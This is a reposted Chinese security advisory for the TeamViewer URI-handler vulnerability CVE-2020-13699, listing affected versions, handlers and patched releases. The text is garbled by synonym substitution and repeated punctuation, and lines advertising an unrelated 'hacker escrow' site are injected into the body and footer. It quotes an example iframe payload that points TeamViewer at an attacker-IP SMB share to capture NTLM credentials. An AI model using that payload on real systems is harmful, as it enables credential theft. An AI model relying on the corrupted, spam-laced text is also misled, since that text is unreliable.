首页 > 清静研究 > 清静转达 > 清静通告

CVE-2020-13699 | TeamViewer清静误差通告

宣布时间 2020-08-09

0x00 误差概述

CVE ID	CVE-2020-13699	时间	2020-08-09
类型		等级	高危
远程使用	是	影响规模	TeamViewer 8,9, 10,11,12,13,14,15版本

0x01 误差详情

克日，，，，，，，TeamViewer宣布清静通告，，，，，，，修复了一个误差（CVE-2020-13699）。。。。。该误差源于程序无法准确引用其自界说URI处置惩罚程序，，，，，，，导致攻击者可起动TeamViewer并执行恣意代码或获得密码哈希。。。。。

要使用该误差，，，，，，，用户需要浏览到一个恶意页面，，，，，，，该恶意页面会在其Web浏览器中加载iframe。。。。。攻击者会将iframe的src 属性设置为

'teamviewer10：--play \\ attacker-IP \ share \ fake.tvs'

鉴黑担保网(jhdbw)·最具权威唯一维权担保平台

此下令体现外地装置的TeamViewer应用程序通过效劳器新闻块（SMB）协议毗连到攻击者的效劳器。。。。。攻击者使用全心制作的URL将恶意iframe嵌入网站中，，，，，，，该URL 会启动TeamViewer Windows桌面客户端并迫使其翻开远程SMB共享。。。。。

由于是受害者的盘算机提倡与攻击者的SMB共享毗连，，，，，，，因此攻击者不需要知道用户的密码，，，，，，，可自动通过身份验证并获得会见权限。。。。。

研究职员体现：“Windows在翻开SMB共享时将执行NTLM身份验证，，，，，，，并且可以转发该请求以执行代码。。。。。”这会影响URI处置惩罚程序teamviewer10、teamviewer8、teamviewerapi、tvchat1、tvcontrol1、tvfiletransfer1、tvjoinv8、tvpresent1、tvsendfile1、tvsqcustomer1、tvsqsupport1、tvvideocall1和tvvpn1。。。。。

0x02 处置惩罚建议

现在厂商已宣布补丁，，，，，，，Windows的TeamViewer用户应思量升级到新的程序版本，，，，，，，其中包括：8.0.258861、9.0.28860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350、15.8.3。。。。。下载链接：

https://www.teamviewer.cn/cn/download/windows/

0x03 相关新闻

https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/

0x04 参考链接

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

0x05 时间线

2020-08-09 VSRC宣布误差通告

鉴黑担保网(jhdbw)·最具权威唯一维权担保平台

7*24小时效劳热线

400-624-3900

官方微信

官方微博

执法声明

鉴黑担保网

网络清静防护

网络清静检测

应用清静

数据清静

清静治理

云清静

工控清静

移动及终端清静

密码应用清静

大模子应用清静

专业清静效劳

清静运营中心

知白学院

威胁情报中心

清静团队

售后效劳

公司概况

新闻动态

手艺专题

人才招聘

投资者关系

资源中心

联系鉴黑担保网

清静研究

CVE-2020-13699 | TeamViewer清静误差通告

关于鉴黑担保网

解决计划

联系鉴黑担保网

7*24小时效劳热线